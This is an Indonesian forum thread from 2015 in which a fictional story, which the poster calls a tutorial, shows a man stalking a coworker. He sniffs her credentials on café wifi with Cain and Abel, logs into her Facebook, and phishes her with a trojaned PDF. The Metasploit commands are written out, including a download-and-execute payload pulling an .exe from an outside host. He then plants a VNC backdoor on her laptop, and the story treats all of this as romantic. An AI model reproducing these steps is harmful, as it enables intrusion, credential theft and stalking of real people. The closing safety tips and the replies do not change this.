Hacker Story : Mendapatkan pujaan hati berawal dari hacking [1]

Discussion in 'Computer' started by wdsindo, May 27, 2015.

  1. wdsindo

    wdsindo New Member

    Joined:
    May 27, 2015
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Budi seorang programmer di sebuah perusahaan swasta
    yang kini sedang terpesona akan kecantikan
    olin,seorang account executive perusahaan asuransi
    di tetangga kantornya.

    sayang,budi yang pemalu hanya mampu curi-curi pandang saja
    setiap kali nongkrong dan ngopi bersama temannya di parkiran
    depan kantornya,menjelang pulang setiap sore

    di suatu kesempatan di cafe langganan para karyawan yang bekerja
    di komplek ruko tersebut,ada olin juga di sana
    dengan berbekal laptop dan 1 jaringan pada wifi yang tersedia di situ
    budi yang telah tersambung melakukan pencarian list ip yang
    tersambung dalam wifi tersebut,karena tampak oleh budi
    olin yang juga menggunakan laptop di sana
    hingga dia berasumsi bahwa olin juga terhubung dalam 1 network


    dan...
    bingo,budi mendapatkan IP address local olin,dia merasa beruntung
    dengan munculnya host name dari laptop olin

    [​IMG]

    "ini yang di sebut mestakung" gumam budi.

    dengan menjalankan cain and abel
    dia bisa memastikan bahwa dari ip local mana
    yang sedang mengunjungi situs apa yang akan
    terpampang jelas user+passwordnya sembari
    mencari keberuntungan secara massal,selain mengejar
    user+password dari olin secara random (email,facebook,twitter)

    dia juga berniat 'iseng' untuk mendapatkan password dari user lain
    yang sedang menggunakan wifi di cafe itu
    dan....

    keberuntungan sekali lagi
    yaitu budi mendapatkan user dan password dari facebook olin

    [​IMG]
    setelah budi mencoba login ke akun facebook olin
    dia ingin mencari tahu email olin,karena saat mendapat
    akun dan password fb olin,budi hanya sebatas mendapat username saja
    bukan email,kali ini dia menuju ke menu "account settings"
    dan melihat email yang di gunakan olin.

    tak bermaksud untuk jahil,budi hanya mengumpulkan informasi penting lainnya
    termasuk,sedikit mengintip album pribadi olin
    dan melihat notifikasi,tentang kiriman terakhirnya di group
    alumni sekolahnya,bahwa olin meminta foto saat wisuda bersama teman-temannya
    kepada seorang di facebook,dan budi sebagai akun olin melihatnya dengan lengkap
    profil tentang teman olin di facebook yang bernama anton
    terpampang jelas alamat email anton ([email protected])

    dari situ muncul ide baru dari seorang budi
    dengan mencari foto wisuda di google
    dan mengumpulkan pada file microsoft word,kemudian
    sekumpulan foto yang berjumlah 6 picture tersebut
    dia konversi menjadi .pdf

    lalu budi menggunakan metasploit untuk injeksi
    zeus trojannya ke dalam file .pdf tersebut
    sebelumnya dia set port 1337 di zeus tadi

    setelah terbuka interface metasploit,segera dia mengetikkan

    use exploit/windows/fileformat/adobe_pdf_embedded_exe kemudian enter
    lalu mengetik set payload windows/download_exec
    kemudian melanjutkan mengetikkan perintah

    set INFILENAME list-foto-wisuda.pdf dan enter lagi

    tak lupa dia set url http://webbudikerenkan.com/tr0j4nqu-unyu-unyu.exe

    tinggal mengetik Exploit list-foto-wisuda.pdf
    akhirnya file pdf tersebut telah 'beracun'
    yang terletak di msf4/local/list-foto-wisuda.pdf .dengan nama list-foto-wisuda.pdf

    dengan menggunakan interspire mailer yang sering di gunakan spammer
    budi hanya perlu menginput alamat pengirim sebagai

    [email protected]

    dan attach file .pdf dan mengetikkan pesan

    "lin,sorry gw jadiin 1 di pdf aja ya,biar kalau lihat fotonya enak
    nih tinggal download aja"


    setelah,email terkirim,budi siap-siap membuka command prompt
    dan menantikan koneksi dari laptop olin
    tak lama kemudian...

    [​IMG]

    komputer olin sepenuhnya dapat di kontrol oleh budi melalui command promptnya
    setelah dia iseng-iseng utak-atik laptop olin,dia menanamkan vnc backdoor
    ke laptop olin,agar dapat mengontrol akses ke interface desktop laptopnya

    sekembalinya ke kantor,budi masih berusaha ingin terhubung ke laptop olin

    "walau tak semudah mendapatkan perhatianmu,yang terpenting
    aku mendapatkan akses ke laptopmu,telah membuat ku bahagia"

    begitulah kira-kira isi hati budi...

    dengan ulah iseng dia mengetikkan perintah di command prompt tadi
    dan yang secara langsung akan mengejutkan olin dan memunculkan
    tulisan di notepad dengan kata-kata

    "toloong....toloong....keluarkan aku dari laptop ini,selamatkan rohku..."

    yang sontak membuat olin kaget,dan berteriak-teriak
    hingga di sore harinya,diantara obrolan teman-teman olin ketika
    nongkrong di parkiran depan kantornya bersama teman-teman budi.

    lalu beberapa temannya,menyarankan olin agar memperbaiki laptopnya
    pada budi,sambil memeriksa apa yang terjadi pada laptop tersebut

    dari sanalah,awal kedekatan budi dan olin,sehingga budi dapat
    melancarkan modusnya untuk berkenalan lebih jauh dengan olin.


    Hacker story ini hanya cerita fiktif belaka
    namun bila ada kesamaan kisah,adalah mohon di maafkan
    Terima Kasih



    *PESAN : Demi keamanan data komputer anda

    1.Jangan download file .pdf sembarangan

    2.Berhati-hati jika sedang online/berinternet menggunakan wifi

    3.Cek secara berkala firewall anda,apakah keadaan mati atau sedang aktif

    sumber : http://webdatasolusindo.co.id/news/...atkan-pujaan-hati-berawal-dari-hacking-1.html
     
  2. iori1071

    iori1071 Member

    Joined:
    May 7, 2015
    Messages:
    46
    Likes Received:
    6
    Trophy Points:
    8
    Google+:
  3. wdsindo

    wdsindo New Member

    Joined:
    May 27, 2015
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    tutorial yang di rangkap dengan cerita :D
     
  4. Liszton

    Liszton Member

    Joined:
    May 6, 2015
    Messages:
    537
    Likes Received:
    28
    Trophy Points:
    28
  5. AquariuZ

    AquariuZ Active Member

    Joined:
    Apr 16, 2015
    Messages:
    1,006
    Likes Received:
    88
    Trophy Points:
    48
    Wah wah wah, secara [tidak] langsung mengajarkan hack sesuatu pada seseorang... Wakakakaka
    @Liszton berminat untuk mencoba pada ..........*bergaya**kagum*
     
  6. ihsansfd

    ihsansfd Member

    Joined:
    Apr 5, 2015
    Messages:
    228
    Likes Received:
    48
    Trophy Points:
    28
  7. Liszton

    Liszton Member

    Joined:
    May 6, 2015
    Messages:
    537
    Likes Received:
    28
    Trophy Points:
    28
    Enggak aah (plis bro jangan ditambahin haha)
     
  8. AquariuZ

    AquariuZ Active Member

    Joined:
    Apr 16, 2015
    Messages:
    1,006
    Likes Received:
    88
    Trophy Points:
    48
  9. ngeblogasyikk

    ngeblogasyikk Well-Known Member

    Joined:
    Feb 1, 2015
    Messages:
    1,207
    Likes Received:
    176
    Trophy Points:
    63
    Ini baru yang pertama ya? *Lihat dijudul
    Berarti masih ada kelanjutannya hhaha

    Tutor sambil cerita itu jenius *bagus*
     
  10. iori1071

    iori1071 Member

    Joined:
    May 7, 2015
    Messages:
    46
    Likes Received:
    6
    Trophy Points:
    8
    Google+:
  11. farid efendi7

    farid efendi7 Member

    Joined:
    Mar 14, 2015
    Messages:
    133
    Likes Received:
    7
    Trophy Points:
    18
    kereeen *wow2* dari dulu pengen belajar hacking tapi gak bisa -bisa :( yang ada gara -gara sering comot software hacking sembarangan, laptop jadi bervirus *benci*
     
  12. pluto01

    pluto01 Member

    Joined:
    May 18, 2015
    Messages:
    496
    Likes Received:
    67
    Trophy Points:
    28
    Puitis banget, keren puisinya
    Apakah jangan2 ini pengalaman pribadi yach hehehehhe
     
  13. seru den ceritanya tapi tutorial kurang mudah dipahami nih ntr klo bikin cerita baru tutorial agak dibikin lebih mudah dimengerti ya buat newbie kaya saya ni
     
  14. auliawn

    auliawn Member

    Joined:
    May 12, 2015
    Messages:
    96
    Likes Received:
    6
    Trophy Points:
    8
    untung ga pernah wifi an di public space :cool:
     
  15. wdsindo

    wdsindo New Member

    Joined:
    May 27, 2015
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    makasih banyak buat yang udah mampir dan komeng,masih ada selanjutnya,sabar ya...

    betul gan masih ada lanjutannya
    makasih gan :)
     
  16. farhaki

    farhaki New Member

    Joined:
    May 19, 2015
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
  17. hakimfikri

    hakimfikri Member

    Joined:
    Nov 11, 2014
    Messages:
    72
    Likes Received:
    2
    Trophy Points:
    8
    Google+:
    Keren Boss
     
  18. dimensidata

    dimensidata Member

    Joined:
    May 22, 2015
    Messages:
    237
    Likes Received:
    33
    Trophy Points:
    28
    Google+:
    Njiirrr, ngakak gw bacanya,,,, *ketawa4*
     
Loading...

Share This Page